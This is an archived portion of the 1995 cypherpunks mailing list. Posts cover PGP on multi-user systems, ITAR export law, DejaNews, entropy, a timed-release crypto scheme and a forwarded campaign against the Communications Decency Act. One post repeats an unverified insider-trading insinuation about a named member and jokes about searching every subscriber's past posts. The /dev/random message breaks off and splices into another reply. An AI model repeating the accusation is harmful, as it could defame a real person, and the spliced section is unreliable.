> >trace it, post the whole thing, including headers, to cypherpunks.
> >
> >Louis

From black at eng.usf.edu Mon Nov 6 19:55:32 1995
From: black at eng.usf.edu (James Black)
Date: Tue, 7 Nov 1995 11:55:32 +0800
Subject: using PGP only for digital signatures
In-Reply-To: <199511062107.NAA29648@ix5.ix.netcom.com>
Message-ID:

Hello,

On Mon, 6 Nov 1995, Bill Stewart wrote:
> At 04:12 PM 11/4/95 -0500, James Black wrote:
> Somebody else has brought up the insecurity of using security software
> on multi-user machines, where the system administrator or anybody who cracks
> root can steal your passphrases and even replace the trustable software with
> trojan-horse versions; your students will be safer if they only trust stuff
> running on PCs from software they've verified themselves. But you can at least
> do signature-checking safely on a multi-user machine if the software is
> protected adequately.

I brought up the security issue with the administrator that I am talking with, about the implementation of PGP as it looks like it will go through all the hurdles. The last difficulty is that we have a student that has an account here, but he is actually overseas (so we will have two copies of PGP, and he will use the international one, not the US one).

The security issue is important. Part of that is that most users use dumb terminals, so any programs run will be done on remote servers. My solution (until I get a better idea) is to just write a mail program that can check the hash value (I think that is the term) of the PGP executable, compare it against the one that it created originally and use it, only if they are the same. The user can also request the number, and write it down for his own personal comparisons.
The program will also automatically encrypt, if it finds the public key on the user's keyring, or the university's keyring.

I will now check on how secure the LAN network is, as I am a student and I want to know that the system is safe. She (the administrator) felt that if it is safe against people getting into accounts it should be safe, but if my signature is on a document, then people will believe that it is from me (until I state otherwise), and that could be more damaging than getting into my account.

Well, I am looking into the security side, since the legal issues are pretty much done with (IMOHO). If anyone has any brilliant ideas as to how to run PGP on a multi-user network utilizing dumb terminals so it can be transparent I am interested in options.

Well, take care and have fun, and I will look for RIPEM (I think that was the name) and see if that will be adequate, at the moment.

James Black
black at suntan.eng.usf.edu

From frogfarm at yakko.cs.wmich.edu Mon Nov 6 20:00:44 1995
From: frogfarm at yakko.cs.wmich.edu (Damaged Justice)
Date: Tue, 7 Nov 1995 12:00:44 +0800
Subject: DejaNews all over again
In-Reply-To:
Message-ID: <199511062222.RAA14762@yakko.cs.wmich.edu>

My two cents: I've used Dejanews for almost a month now, and have been consistently impressed with the results. The uses are many; the danger, as others have noted, is that people forget (or never realize in the first place) that you should never post anything to Usenet that you wouldn't want to see plastered on the evening news.

Having said that, I'm greatly looking forward to the impending addition of the alt.* groups to their archives. Everyone is indeed a Kibo now, and the general public has become more aware of the need for reputations as a result.
--
http://yakko.cs.wmich.edu/~frogfarm ..for the best in unapproved information
EmmaGoldmanCamillePagliaMarieCurieAynRandSapphoDianaToriAmosPJHarvey&Demona
Living in dread with your fragile brain and the executioner's got your number
I feel a groove comin' on Freedom...yeah, right.

From tcmay at got.net Mon Nov 6 20:04:43 1995
From: tcmay at got.net (Timothy C. May)
Date: Tue, 7 Nov 1995 12:04:43 +0800
Subject: toolkits?
Message-ID:

At 12:41 AM 11/7/95, Stephen Whitaker wrote:
>OK folks, nobody seems to have any ideas how to keep our little state of
>Vermont from falling prey to mediocrity in the internet. I thought with so
>many highly opinionated people I would at least get a few good or at least
>entertaining suggestions.

You may have gotten no responses because it generally is not up to a state government to ensure that "mediocrity" in the Internet is avoided (though I'm not sure what is meant by "mediocrity." If it is security and anonymity, this is definitely the state government's responsibility, or even area of interest.)

>just might have a prayer of doing it right, whatever that is. What would it
>look like if secure communications and anonymity were designed in from the
>start? Is this what Sameer is doing in Bezerkeley?
>
>What machines are considered minimum requirements to use these tools? What
>are the essential reference works?

"Security and anonymity" are not matters for government to ensure.

Imagine two Vermont residents, Bob of Burlington and Rhonda of Rutland. They wish to communicate securely, and perhaps anonymously. Alas, the state legislature in Montpelier is oblivious to their concerns, not even answering their e-mail. What, oh what, are they to do?

Not to worry, as what Vermont does is irrelevant. Bob of Burlington can encrypt his messages to Rhonda of Rutland and send them in any number of ways. Compuserve, AOL, and (probably) Netcom will have local access points.
Happily, Rhonda of Rutland and Bob of Burlington (not their real names) can communicate secretly, securely, and anonymously.

I urge you, Stephen, to read up on encryption and the benefits contained therein. Looking to your state capital to secure your communications is a lose.

--Tim May

Views here are not the views of my Internet Service Provider or Government.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May | Crypto Anarchy: encryption, digital money,
tcmay at got.net 408-728-0152 | anonymous networks, digital pseudonyms, zero
Corralitos, CA | knowledge, reputations, information markets,
Higher Power: 2^756839 | black markets, collapse of governments.
"National borders are just speed bumps on the information superhighway."

From junger at pdj2-ra.F-REMOTE.CWRU.Edu Mon Nov 6 20:14:19 1995
From: junger at pdj2-ra.F-REMOTE.CWRU.Edu (Peter D. Junger)
Date: Tue, 7 Nov 1995 12:14:19 +0800
Subject: Exporting software doesn't mean exporting (was: Re: lp ?)
In-Reply-To: <199511061924.OAA14371@jekyll.piermont.com>
Message-ID:

"Perry E. Metzger" writes:

:
: "Peter D. Junger" writes:
: > "Perry E. Metzger" writes:
: > : It isn't clear that telecoms treaties don't implicitly make this legal
: > : in spite of the export regulations.
: >
: > Once again, what the ITAR forbid is the disclosure of cryptographic
: > software to a foreign person within or without the United States, so
: > it does not make any difference whether the message containing the
: > code passes through the United States or not.
:
: I understand that you are a lawyer and I'm not, but it is my
: understanding that international treaties come into play on this sort
: of thing. For instance, in international shipments, you can transship
: items and substances that are illegal to possess in a country through
: its ports provided that the materials do not originate or terminate
: their shipment in the country and remain sealed in their containers
: throughout. It is also my understanding that items like mail and phone
: calls that happen to transit a country are not necessarily subject to
: that nation's laws provided that the nation is not a terminal point for
: the mail or call or what have you.

The trouble is that the ITAR's definition of export that is relevant to cryptographic software has nothing to do with exporting in the normal sense, and therefore it has nothing to do with transhipments. The definition of export that is relevant simply makes it a felony to disclose technical data, which is defined as including cryptographic software, to a foreign person within or without the United States.

Thus I cannot disclose my materials for my course in Computers and the Law, which include some cryptographic software, to a Canadian student in the United States without getting a license, even though there is an exception which would allow me to export the software to Canada.

It doesn't make any difference whether the disclosure--or the message that makes the disclosure possible--passes through a foreign jurisdiction or not. It is the disclosure, and only the disclosure, that requires the license. Not the transmission of the message.

Don't blame this on my being a lawyer; blame it on some very sick people in the Office of Defense Trade Controls and in the NSA.

--
Peter D. Junger--Case Western Reserve University Law School--Cleveland, OH
Internet: junger at pdj2-ra.f-remote.cwru.edu junger at samsara.law.cwru.edu

From tytso at MIT.EDU Mon Nov 6 20:18:42 1995
From: tytso at MIT.EDU (Theodore Ts'o)
Date: Tue, 7 Nov 1995 12:18:42 +0800
Subject: /dev/random - using up entropy?
In-Reply-To: <199511042352.PAA07554@ix4.ix.netcom.com>
Message-ID: <9511070110.AA07972@dcl.MIT.EDU>

Date: Sat, 04 Nov 1995 15:52:03 -0800
From: Bill Stewart

So that says you use up m bits of entropy if you get m bits of good output.
However, what I'd like to suggest is that you don't, from the perspective of a user who doesn't have direct access to the reservoir R of random bits. For that user, p(X|H(R)=O) is the same as p(X) or P(X|H(R)=O'), because the user is neither able to invert H, nor to enumerate all possible R, nor to calculate anything useful based on multiple outputs, since the reservoir R is shuffled between outputs; even a simple circular shift may be enough. This doesn't apply to the case where n is 32 or 48 and the hash function produces n-bit outputs, or even m<
Message-ID: <47m051$236@yage.tembel.org>

In article <9511061509.AA10512 at mhv.net>, Lynne L. Harrison wrote:
> If, however, the growth continues with people, not only accessing the net,
> but getting domain names - doesn't it seem likely that, at some point, only
> IP addresses will be left (or dumb domain names like http://www.stkdlcp.com)?
> Ergo, what is the problem with having a numerical URL?

Stability. Originally DNS was just a handy user-friendly thing, but then it became the primary way to name a host. This allowed the IP address to become irrelevant, which allows entire sites to be renumbered when the network topology changes. This is important to keep the routing tables small (by minimizing the backwards-compatibility exceptions), which is a critical problem today. Thus all recent architectural decisions have been away from direct use of IP addresses anywhere.

DNS zone table size is also a problem; solutions will probably be in the form of new top-level domains. You might see http://fubarco.www or http://www.ibm or http://www.fubarco.inc, but not http://10.5.23.10.

Neither routing table scaling nor DNS zone scaling is really on-topic; if you're interested I'll give you some pointers in private mail.

-- Shields.

From shields at tembel.org Mon Nov 6 20:26:41 1995
From: shields at tembel.org (Michael Shields)
Date: Tue, 7 Nov 1995 12:26:41 +0800
Subject: Timed-release crypto and information economics
Message-ID: <47m82v$4p4@yage.tembel.org>

-----BEGIN PGP SIGNED MESSAGE-----

1. Method

In 1993, Timothy C. May posted a message to this list with some thoughts on time-release crypto. I think his system is too complex. Here I present a cleaner model, and show how it can be used in several real-life ways.

In the May proposal, when you have a message to be encrypted, you encrypt it with a session key, optionally split that key with an n-of-m scheme, and then send the key into a network of escrow agents, which are instructed to hold the message for a given period of time. You then hold onto the encrypted message, though you need not keep it secret. Conceptually, you have encrypted a message and then remailed the key to yourself in such a way that it will take X length of time to arrive.

I have a simpler, public-key plan. When you want to keep a message secret until date X, you ask your favorite crypto house to generate a key pair and hold the secret key until date X. You then encrypt your message with the public key, and again hold onto the encrypted message. N-of-m trust management can be implemented by secret-sharing your message and encrypting each with a key generated by a different crypto house.

This method is clean, fully anonymous, and nearly stateless.

2. Economics

I've worked out a payment model for both the public and secret key, which I think can be used for any sort of information in an information economy not based on (increasingly unenforceable) intellectual property laws.

In this model, the creator of information charges enough to recover his costs (call this price, the price available to the first buyers, the "primary cost"). It is then possible for resellers to purchase it and try to make a profit through multiple sales at a lower price.
If the reseller is hoarding the information, another one can step in, pay the same initial rate, and try to do better.

This model separates marketing of information from producing it, and gives an easy way to profit from doing either. Of course, it's possible to conflate them into an information creator that sells directly to end-users.

Once you abstract this you'll notice that (a) it's much like existing models for those who create information for hire, such as writers and programmers who sign over copyright but could recreate the work; and (b) it can be applied to many less extreme scenarios, such as where the reseller makes the product available but under a restrictive licence. I think this is the basic fabric of an information economy.

Applying it to the selling of timed-release pairs, the primary cost of the public key is some nominal charge, and the primary cost of the secret key is the amount required to judge whether or not it should be released -- a trivial amount for time-based release but something more for event-based release. (A corollary is that you might pay the judging fee for a secret key, and receive instead a certificate saying that it cannot yet be released.)

3. Applications

* Bonds: You deliver $1000 in ecash to the issuer. In return it gives you a unique certificate redeemable for $1100, encrypted such that it may not be decrypted until the maturity date. You also get a certificate saying that your encrypted bond is a bond, so that you may demonstrate fraud if you find something else once you decrypt it at maturity. Essentially this is the same as creating a private corporate ecash bank. Coupon bonds are a trivial extension.

* Retirement plans, cryonics funds, and wills: You encrypt your assets or your will in a custom event-based key, and archive it with your executor.

* Idea futures: You have a pair of key pairs generated, one for encrypting YES coupons, and the other for NO coupons.
Now anyone can generate and sell their own coupons, consisting of $1 in ecash encrypted with a YES or NO event-release key, again with a certificate of authenticity to verify fraud.

* Bonding: You pay $1001 for a reputable institution to give you a $1000 bond encrypted in the event-release key based on your breach of contract, and its complementary negative key, and send you and the other party each one bond. If you default on your contract, the injured party can ask the crypto house to release the default key; if you do not, you can ask the crypto house to release the other key.

4. Cypherpunks write code

I'll let everyone tear into this for a few days, and then I'll put up a server for timed-release key generation, charging maybe c$1. I'd like to then enhance it to be capable of issuing bonds and loans denominated in c$. (I like the cyberbucks trial because it's officially play money, so there aren't any regulatory burdens.)

This should be interesting.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMJ6jgeyjYMb1RsVfAQHKPAP8CF8HAN3dPa0QaJ3knDuv5gKd2yIUE57G
icK5flsVOHcmq2+y3LkB8uCWBT1IxyoWv9I2u1yQbujYtttjgparCoCeErXk7uPe
h7yY/eZzx3wgIrGxMEGePZftwoA2aGfyO+wDy/5lPZ0yWxLpoLr67RfpWbutqinf
bmn6xeL64lg=
=iXOF
-----END PGP SIGNATURE-----

-- Shields.

From s1113645 at tesla.cc.uottawa.ca Mon Nov 6 20:36:15 1995
From: s1113645 at tesla.cc.uottawa.ca (s1113645 at tesla.cc.uottawa.ca)
Date: Tue, 7 Nov 1995 12:36:15 +0800
Subject: DejaNews all over again--a URL for Usenet Searching
In-Reply-To:
Message-ID:

Synchronicity at work.

On Mon, 6 Nov 1995, Timothy C. May wrote:
> http://dejanews.com/
>
> It allows searching of Usenet archives (a few months' worth, from what I
> can see).

It's extremely funny that you of all people should post this Tim, as your tcmay at got.net address was the first thing I ran a search on when I discovered this site.
Judging by the amount of posting you do here, I was surprised that I only got 36 listings on your new address (1/3 of which quoted you but not directly written by you). Either you post more to alt, soc and talk (which they don't have) or you use a third address (the second thing I tried was tcmay at netcom.com, even less, though the archive's pretty recent, so that's expected). Hmm, so you know insiders at Apple and recently held around $65,000 of their stock and sold off, saving around $12k in the process after being tipped off? Hmmm... (from rec.investment or something along those lines. Want me to repost your original article? heheheh. ) I figured I'd send this to you as a private note, but then I figured this thing really is scary and has a lot to do with anonymity. Watch out folks. Litte Brother is saving everything you've ever said on usenet. Your old posts just won't go away. (Not that someone who is so open in his views and true name as yourself would mind, Tim, but I'm certainly happy for my sake, that alt isn't archived yet. It's bad enough they have rec.) Ps. I will of course run searches on every other address that the who command on majordomo at toad.com supplies me with, so watch what you say ladies, gents and otherwise. ;-> Get those 'nyms ready. From vznuri at netcom.com Mon Nov 6 20:49:45 1995 From: vznuri at netcom.com (Vladimir Z. Nuri) Date: Tue, 7 Nov 1995 12:49:45 +0800 Subject: "The Policeman Inside" In-Reply-To: Message-ID: <199511070019.QAA27707@netcom18.netcom.com> TCM: >Even if one believes taxes are "the price paid for civilization," there are >superior alternatives to the current system. (My current favorite is: >mandatory slavery for X days per year, regardless of age or ability. >Instead of taxes, everyone works one day in five, or 2 months out of the >year, etc., for the herd. Building roads, picking up trash, administering >computers, etc. 
There are "lots of issues," but even I agree this list is
>not the best place to discuss it; I mention it in passing.)

good lord!! a kinder, gentler TCM!! a closet socialist!! this does NOT sound like something I would read from the founder of cryptoanarchy. what is cyberspace coming to?

From lharrison at mhv.net Mon Nov 6 21:05:34 1995
From: lharrison at mhv.net (Lynne L. Harrison)
Date: Tue, 7 Nov 1995 13:05:34 +0800
Subject: FWD:Religious Right Threatens to Shut Down Net: Call NOW
Message-ID: <9511070330.AA15297@mhv.net>

>Return-Path:
>Date: Mon, 6 Nov 1995 13:43:13 -0500
>From: ACLUNATL at aol.com
>To: beeson at aclu.org
>Subject: Religious Right Threatens to Shut Down Net: Call NOW
>Content-Length: 27519
>
>Here are the advocacy instructions for individuals opposed to the Federal
>Online Indecency Legislation that we promised last week.
>
>========================================================================
>       CAMPAIGN TO STOP THE EXON/COATS COMMUNICATIONS DECENCY ACT
>       (SEE THE LIST OF CAMPAIGN COALITION MEMBERS AT THE END)
>
>       Update: -Latest News:
>                The Christian Coalition is pushing Congress to censor
>                the net more heavily than even Sen. J.J. Exon ever imagined.
>                There is the very real possibility that they may succeed.
>
>                You should be very worried. We are.
>
>               -What You Can Do Now:
>                Follow the directions below and call House Speaker
>                Gingrich and Senate Leader Dole. Implore them
>                to allow parents to make choices for their children, instead
>                of government censors.
>
>                Volunteer to join the fight by helping organize in your
>                home town.
> > CAMPAIGN TO STOP THE UNCONSTITUTIONAL COMMUNICATIONS DECENCY ACT > Nov 2, 1995 > > PLEASE WIDELY REDISTRIBUTE THIS DOCUMENT WITH THIS BANNER INTACT > REDISTRIBUTE ONLY UNTIL December 1, 1995 > REPRODUCE THIS ALERT ONLY IN RELEVANT FORUMS > >________________________________________________________________________ >CONTENTS > The Latest News > What You Can Do Now > The letter from Ed Meese and the Christian Right > Chronology of the CDA > For More Information > List Of Participating Organizations > >________________________________________________________________________ >THE LATEST NEWS > >Since the very first day that Senator J.J. Exon (D-NE) proposed censorship >legislation for the Internet, the Christian Right has pushed for the most >restrictive regulations they could think of. > >The Religious Right (which does not necessarily speak for all religious >people concerned with this issue) recently tipped their hand in a letter >to Sen. Larry Pressler (R-SD) and Rep. Thomas Bliley (R-VA) requesting >a new and more restrictive net censorship proposal. > >There are essentially three new dangerous elements of their campaign >to shut down cyberspace: > > >INTERNET PROVIDERS, ONLINE SERVICES, AND LIBRARIES CRIMINALLY LIABLE FOR > EXPRESSION ONLINE >The Religious Right has proposed to hold anyone who provides access to the >Internet or other interactive media, including online services providers, >ISP's, BBS's, Libraries, and Schools, criminally liable for all speech >carried on the network. > >In order to avoid liability under this provision, service providers would be >forced to monitor user's electronic communications to be assured that >no "indecent" material is transmitted across their networks. > >This proposal is MORE RESTRICTIVE than the Exon Communications Decency Act, >or any other net censorship legislation currently in Congress. 
> >In their letter to Congress, the Religious Right says: > > [Providers] would simply be required to avoid KNOWING violations of > the law. [emphasis added] > >However, the "knowing" standard is vague enough that the mere knowledge >that such material exists could be sufficient to trigger criminal liability. >A single complaint or even a news report could force a service provider to >take down a web page, remove posts to chat rooms or other discussion >forums, or shut down listservs in order to avoid going to jail and facing >huge fines. > > >A STANDARD FOR INDECENCY >The proposals pushed by the Christian Coalition relies on the >unconstitutional "indecency standard". Like the Exon Communications >Decency Act, the Christian Coalition seeks to regulate all indecent >speech online. > >Indecency is a broad category that includes everything from George Carlin's >"seven dirty words" to such classic novels and "The Catcher in the Rye" and >"Lady Chatterly's Lover". > >The Supreme Court has ruled that restrictions on indecent speech are >Constitutional only if they rely on the "least restrictive means". Broad >indecency restrictions on interactive media do not satisfy the "least >restrictive means" test, because interactive media allows users and >parents tremendous control over the information they receive. > >Any legislation which attempts to apply an indecency restriction to the >Internet is unconstitutional on its face. > >The Christian Coalition's proposal that relies on an indecency >restriction contemplates dumbing down every conversation, web page, >newsgroup, and mailing list on the Internet to the level of what is >not offensive to children. > >What kind of discussions between adults are possible in an arena >where everything has been reduced to the level of the Lion King? > > >UNPRECEDENTED CONTROL OVER ONLINE SPEECH FOR THE FCC >The Christian Coalition would give the FCC broad jurisdiction over >cyberspace. 
It would allow the FCC jurisdiction over your online >speech, and over the design Internet software, such as web browsers and >filtering programs that parents can use to control their children's >access to the Internet. > >The Internet has developed from a government project to a market-driven >economic boom for thousands of businesses. Giving the FCC authority over >this medium would significantly hinder the growth of this new industry. > >________________________________________________________________________ >WHAT YOU CAN DO NOW > >1. The proposals from the Religious Right will literally destroy online > speech as we know it. The odds of stopping this are not certain. > > There is a very real chance that this legislation will pass, and > we will experience a period of uncertainty and chilling of speech > while an appropriate test case attempts to reach the Supreme Court > (should it even get there!) > > The Religious Right has a strong grass-roots network. We need to > counter their energy and ensure cyberspace is not lost due to them. > > IMMEDIATELY CALL House Speaker Gingrich (R-GA) and Senate Leader > Dole (R-KS) and urge them to oppose the Christian Coalition's > proposal. > > Name, Address, and Party Phone Fax > ======================== ============== ============== > R GA Gingrich, Newt 1-202-225-4501 1-202-225-4656 > R KS Dole, Robert 1-202-224-6521 1-202-224-8952 > > If you're at a loss for words, try one of the following: > > Please oppose the recent proposal from the Religious Right to > censor the Internet. The only effective way to address children's > access to the Internet is through parental control tools outlined > by the Cox/White/Wyden approach. > or > As a religious person and a parent, I oppose the Religious Right's > attempts to censor the Internet. I am the best person to monitor > my child's access to the Internet using parental control tools > as outlined in the Cox/White/Wyden approach. > >2. 
Join the online fight by becoming a volunteer for your district! > > Check to see if you're legislator is in the list below. If they are > not, consult the free ZIPPER service that matches Zip Codes to > Congressional districts with about 85% accuracy at: > > URL:http://www.stardot.com/~lukeseem/zip.html > > The conference committee legislators are: > House: Barr (R-GA), Barton (R-TX), Berman (R-CA), Bliley (R-VA), > Boucher (D-VA), Brown (D-OH), Bryant (D-TX), Buyer (R-IN), > Conyers (D-MI), Dingell (D-MI), Eshoo (D-CA), Fields (R-TX), > Flanagan (R-IL), Frisa (R-NY), Gallegly (R-CA), Goodlatte (R-VA), > Gordon (D-TN), Hastert (R-IL), Hoke (R-OH), Hyde (R-IL), > Jackson-Lee (D-TX), Klug (R-WI), Lincoln (D-AR), Markey (D-MA), > Moorhead (R-CA), Oxley (R-OH), Paxon (R-NY), Rush (D-IL), > Schaefer (R-CO), Schroeder (D-CO), Scott (D-VA), Stearns (R-FL), > White (R-WA) > Senate: Burns (R-MT), Exon (D-NE), Ford (D-KY), Gorton (R-WA), > Hollings (D-SC), Inouye (D-HI), Lott (R-MS), McCain (R-AZ), > Pressler (R-SD), Rockefeller (D-WV), Stevens (R-AK) > > If your legislator is on the conference committee, you have a chance > to influence their vote on this issue with your power as a constituent. > Volunteer to help educate your legislator by sending mail to > volunteer at vtw.org. A coalition volunteer will be in touch with you. > > You can starting working to help spread the word in your district by > sending this letter to five friends. Ask them to call Dole and Gingrich > as well. > >3. The People for the American Way (PFAW) and the American Civil Liberties > Union are organizing a letter from ORGANIZATIONS to the Conference > Committee to oppose the censorship provisions. > > If you are a representative of an organization that would like to > signon to this letter, you should contact jlesser at pfaw.org IMMEDIATELY. > >4. We can't suggest relaxing at this point. The stakes are too high, and > the risk is too great. Everything now hangs in the balance. 
> >________________________________________________________________________ >THE LETTER FROM ED MEESE AND THE CHRISTIAN RIGHT > >October 16, 1995 > >The Honorable Thomas J. Bliley, Jr. Chairman >Committee on Commerce >United States House of Representatives >Washington, DC 20515 > >The Honorable Larry Pressler, Chairman >Committee on Commerce, Science, and Transportation >United States Senate >Washington, DC 20510 > >Re: Computer Pornography Provisions in Telecommunications Bill > >Dear Mr. Chairmen: > >We are writing to urge the conference committee seeking to reconcile the >telecommunications bills passed by the House and Senate include in the >final bill the strongest possible criminal law provisions to address the >growing and immediate problem of computer pornography without any >exemptions, defenses, or political favors of any kind accorded to those >who knowingly participate in the distribution of obscenity to anyone or >indecency to children. While there is no perfect solution to the problem >of computer pornography, Congress could not hope to solve this problem by >holding liable only some who are responsible for the problem. > >The recent Justice Department prosecution project targeting those who >violated federal child pornography law using America On-Line is >instructive in this regard. More than ninety individuals were targeted for >prosecution although many others, perhaps as many as 3,000 according to >one press report, were originally targeted by the Department of Justice as >potential violators of child pornography laws. Apparently due to a >shortage of investigative and prosecutorial resources, the project was >limited. Since there are insufficient resources to investigate and >prosecute but a fraction of those that are trafficking in child >pornography by computer, then there will likely be even fewer resources >available to investigate and prosecute those involved in obscenity and >indecency. 
> >Thousands of individuals both in this country and abroad are regularly >placing obscenity and indecency on the Internet. It is not possible to >make anything more than a dent in the serious problem of computer >pornography if Congress is willing to hold liable only those who place >such material on the Internet while at the same time giving legal >exemptions or defenses to service or access providers who profit from and >are instrumental to the distribution of such material. The Justice >Department normally targest the major offenders of laws. In obscenity >cases prosecuted to date, it has targeted large companies which have been >responsible for the nationwide distribution of obscenity and who have made >large profits by violating federal laws. Prosecution of such companies has >made a substantial impact in curbing the distribution of obscenity, with >many such offenders going out of business altogether. So too will >prosecution of access providers which _knowingly_ traffic in obscenity >have a substantial impact, a far greater impact than just the prosecution >of a person who places one or a few prohibited images on the Internet. >Such a person could not traffic in pornography without the aid or >facilitation of the service or access providers. Indeed, if Congress >includes provisions protecting access or service providers in whatever >bill is finally passed, it is likely that most in this country who are >trafficking in indecency to children or obscenity would continue to do so >since the threat of prosecution would be minuscule, given the numbers of >those currently involved in this activity. It is also likely that those >outside our country who are engaged in these activities would continue to >do so since it would be nearly impossible to extradite them to the United >States for prosecution. 
Thus, unless all who knowingly participate in such >matters are subject to the law, the Internet will remain the same and >Congress will have failed in its responsibilities to the children and >families of America. > >Federal law has traditionally assigned equal liability both for those who >commit a crime and those who aid and abet a crime. See Title 18 U.S.C. >Code Section 2: "(a) whoever [sic] commits an offense against the United >States or aids, abets, councils [sic], commands, induces, or procures its >commission, is punishable as a principle [sic]." Service or access >providers who knowingly participate in the distribution of indecency to >children or in obscenity to anyone are aiders and abettors in the >commission of those crimes and thus should have liability under any law >Congress passes. Current federal law on child pornography provides no no >exemption or defense for access providers. Thus, the child pornography law >provides a strong deterrent against trafficking in child pornography for >those who would otherwise knowingly participate in its distribution by >computer whether pedophile or access provider. > >The changes in law which we support would not hold an access provider >criminally liable for all illegal pornography on the Internet which their >services may be used to obtain. Nor would it require that access providers >check all communications to ensure that no violations of the law are >occurring. They would simply be required to avoid knowing violations of >the law. This is an obligation imposed on all citizens. Technology exists >today for access providers, through a simple process, to target or flag >and remove files containing objectionable material. > >We support the House-passed language insofar as it addresses obscenity by >amendment Title 18, Sections 1462, 1465, and 1467 of the United States >Code. 
The provision restricting transmission of indecency in the House-passed >bill, an amendment to Section 1465, is inadequate, and we urge that it be >substantially revised. > >Attached is the specific language we support which includes the House >passed language on obscenity and includes revisions on both the House >passed language on indecency, which would amend Title 18 and the >Senate-passed language on indecency, which would amend Title 47. The >combination of these provisions, we believe, would provide effective laws >to curb obscenity and indecency on the Internet by establishing that all >who knowingly participate in the distribution or facilitation of obscenity >to anyone or indecency to children would be subject to the law. > >Thank you for your concern and attention to this matter. > > >[signed] > >Edwin Meese III > >Ralph Reed >Christian Coalition > >Donald E. Wildmon >American Family Association > >Alan Sears, Former Executive Director >Atty General's Commission on Pornography > >Phyllis Shafly >Eagle Forum > >Beverly LaHaye >Concerned Women for America > >Reverend Louis P. 
Sheldon >Traditional Values Coalition > >Jay Sekulow >American Center for Law and Justice > >Paul Weyrich >Free Congress Foundation > >Paul McGeady >Morality in Media > >Len Munsil >National Family Legal Foundation > >Robert Peters >Morality in Media > >Kenneth Sukhia >Former United States Attorney, N.D., FL >Former Chairman, Atty General's Advisory Committee >Subcommittee on Child Exploitation and Obscenity > > >-------------------------- > > >Section 1465 of Title 18, United States Code, is amended to punish >distribution by computer of indecent material to minors by adding at the >end the following: > >Whoever knowingly communicates, transmits, or makes available for >communication or transmission, in or effecting interstate or foreign >commerce an indecent communication by computer to any person the >communicator or transmitter believes has not attained the age of 18 years >of age, knowing that such communication will be obtained by a person >believed to be under 18 years of age, shall be fined under this title or >imprisoned not more than five years, or both. > >TITLE IV -- OBSCENE, HARASSING, AND WRONGFUL UTILIZATION OF >TELECOMMUNICATIONS FACILITY > >SEC. 401. SHORT TITLE > This title may be cited as the "Communications Decency Act of >1995". > >Sec. 402. OBSCENE OR HARASSING USE OF TELECOMMUNICATIONS FACILITIES UNDER >THE COMMUNICATIONS ACT OF 1934 > >Section 223 (47 U.S.C. 
223) is amended -- > (1) by striking subsection (a) and inserting in lieu of [sic]: > ``(a) Whoever-- > ``(1) in the District of Columbia or in interstate or foreign >communications -- > ``(A) by means of telecommunications device knowingly-- > ``(i) makes, creates, or solicits, and > ``(ii) initiates the transmission of, > any comment, request, suggestion, proposal, image, or other > communication which is obscene, lewd, lascivious, filthy, or > indecent, with intent to annoy, abuse, threaten, or harass > another person; > ``(B) makes a telephone call or utilizes a > telecommunications device, whether or not conversation or > communication ensues, without disclosing his identity and > with intent to annoy, abuse, threaten, or harass any person > at the called number or who receives the communication; > ``(C) makes or causes the telephone of another repeatedly > or continuously to ring, with intent to harass any person at > the called number; or > ``(D) makes repeated telephone calls or repeatedly > initiates communication with a telecommunications device, > during which conversation or communication ensues, solely to > harass any person at the called number or who receives the > communication; > ``(2) knowingly permits any telecommunications facility > under his control to be used for any activity prohibited by > paragraph (1) with the intent that it be used for > such activity, > > shall be fined not more than $100,000 or imprisoned not more > than two years, or both.''; and > > (2) by adding at the end the following new subsections: > > ``(d) Whoever-- > ``(1) knowingly within the United States or in foreign > communications with the United States by means of > telecommunications device makes or makes available any > indecent communication in any form including any comment, > request, suggestion, proposal, or image, to any person under > 18 years of age regardless of whether the > maker of such communication placed the call or initiated the > communication; or > 
``(2) knowingly permits any telecommunications facility > under such person's control to be used for an activity > prohibited by paragraph (1) with the intent that it be > used for such activity, > shall be fined not more than $100,000 or imprisoned not more > than two years or both. > ``(e) Defenses to subsections (a) and (d), restrictions on > access, judicial remedies respecting restrictions for > persons providing information services and > access to information services-- > "(1) It is a defense to prosecution that a person has complied > with regulations designed to restrict access to indecent > communications to those 18 years old or older as enacted by the > Federal Communications Commission which shall prepare final > regulations within 120 days of the passage of this bill. Until > such regulations become effective, it is a defense to > prosecution that the person has blocked or restricted access > to indecent communications to any person under 18 years > of age through the use of verified credit card, adult access > code, or adult personal identification number (PIN). > Nothing in this subsection shall be construed to treat > enhanced information services as common carriage." > "(2) No cause of action may be brought in any > court or any administrative agency against any person on account > of any activity which is not in violation of any law punishable > by criminal or civil penalty, which activity the person has taken in > good faith to implement a defense authorized under this section or > otherwise to restrict or prevent the transmission of, or access to, > a communication specified in this section. > (f) Nothing in this subsection shall preclude any State or > local government from enacting and enforcing laws and regulations > which do not result in the imposition of inconsistent obligations on > the provision of interstate services. 
Nothing in this subsection > shall preclude any State or local government from governing conduct > not covered by subsection (d)(2)." > (g) Nothing in subsection (a), (d), or (e) or in the > defenses to prosecution under (e) shall be construed > to affect or limit the application or enforcement of any other > Federal law. > (h) The use of the term 'telecommunications device' in this > section shall not impose new obligations on (one-way) broadcast > radio or (one-way) broadcast television operators licensed by the > Commission or (one-way) cable services registered with the > Federal Communications Commission and covered by obscenity and > indecency provisions elsewhere in this Act. > >Sec. 403. OBSCENE PROGRAMMING ON CABLE TELEVISION. > > Section 639 (47 U.S.C. 559) is amended by striking "10,000" and >inserting "$100,000" > >Sec. 404. BROADCASTING OBSCENE LANGUAGE ON THE RADIO. > > Section 1466 of Title 18, United States Code, is amended by >striking out "$10,000" and inserting "$100,000". > >Sec. 405 SEPARABILITY > > "(a) If any provision of this Title, including amendments to this >Title of [sic] the application thereof to any person or circumstance is >held invalid, the remainder of this Title and the application of such >provision to other persons or circumstances shall not be affected >thereby." > >________________________________________________________________________ >CHRONOLOGY OF THE COMMUNICATIONS DECENCY ACT > >Sep 26, '95 Sen. Russ Feingold urges committee members to drop > Managers Amendment and the CDA from the Telecommunications > Deregulation bill >Aug 4, '95 House passes HR1555 which goes into conference with S652. >Aug 4, '95 House votes to attach Managers Amendment (which contains > new criminal penalties for speech online) to > Telecommunications Reform bill (HR1555). >Aug 4, '95 House votes 421-4 to attach HR1978 to Telecommunications > Reform bill (HR1555). 
